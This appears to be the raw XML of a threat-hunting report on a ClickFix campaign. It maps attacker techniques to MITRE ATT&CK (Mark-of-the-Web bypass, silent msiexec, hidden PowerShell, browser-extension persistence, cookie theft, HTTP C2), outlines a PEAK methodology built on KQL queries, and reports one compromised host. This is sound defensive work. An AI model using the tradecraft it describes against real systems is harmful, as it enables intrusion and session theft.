                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">irm to an IP in decimal format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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">T1564.003 – Hidden Window</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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">GetConsoleWindow / ShowWindow / FreeConsole</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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">T1553.005 – Mark-of-the-Web Bypass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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Unblock-File and SEE_MASK_NOZONECHECKS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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">T1218.007 – Msiexec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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">msiexec /i /qn /norestart</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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">T1055 – Process Injection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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">csc.exe and ilasm.exe with no arguments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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">T1027 – Obfuscated Files or Information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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">IP in decimal; scripts with random names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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">T1176.001 – Browser Extensions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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Persistence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before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Unpacked extension in Secure Preferences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240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">T1016 – System Network Configuration Discovery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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Discovery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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Query to ipinfo.io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before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">T1539 – Steal Web Session Cookie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before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Credential Access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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">The extension reads and writes cookies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before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">T1071.001 – Web Protocols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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Command and Control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before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">C2 over HTTP and HTTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008B">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008C">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The exercise follows the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> framework and the Pyramid of Pain: the hypothesis is written at the TTP level, because the script hash changed on every download and the infrastructure lasted hours, but the behavior did not change.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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ss889l6lkwo" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">METHODOLOGY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008F">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The exercise was structured around the three phases of the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PEAK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> framework (Prepare, Execute, Act) and five steps. Each result fed the next question.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00"/>
        <w:gridCol w:w="5129"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1500"/>
            <w:gridCol w:w="2400"/>
            <w:gridCol w:w="51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90">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Phase</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91">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Step</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92">
            <w:pPr>
              <w:spacing w:after="40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">In this case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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">1.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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Users who pasted a ClickFix command into Win+R (see section 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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">2.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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Defender for Endpoint process, registry (RunMRU), network and file events, plus Script Block Logging. Declared gap: the clipboard is not logged.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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">3.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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">7 KQL queries in Microsoft Sentinel, each tested against an event we knew existed (positive control).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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">4.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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Each result was classified as malicious, benign or inconclusive. 1 host confirmed, 4 hits.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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5.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40" w:before="40" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">3 detections, 1 gap, 1 new hypothesis. The report feeds back into step 1.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A2">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A3">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How the queries were chained:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A4">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Did anyone paste a command?</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explorer.exe launches an interpreter with a download command (query 1) and writes the same line to RunMRU (query 1b).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A5">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Why did they paste it four times?</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Script Block Logging shows the script was hiding the console (query 2).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A6">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What came next?</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msiexec launches a hidden PowerShell (query 3).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A7">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Who did it talk to?</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.NET binaries with no arguments making outbound connections (query 4) and a public IP check (query 5).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A8">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How does it stay?</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a process that is not the browser modifies the Chrome profile (query 6).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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my9ycng2iqs" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:cs="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FINDINGS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AB">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The hypothesis was </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">confirmed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on a single host in the fleet, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXX-01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The full chain, from the paste to the persistence, was reconstructed from Defender for Endpoint telemetry before looking at the alert.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AC">
      <w:pPr>
        <w:spacing w:after="0" w:before="120" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="4754880" cy="540327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54880" cy="5403272"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AD">
      <w:pPr>
        <w:spacing w:after="0" w:before="60" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
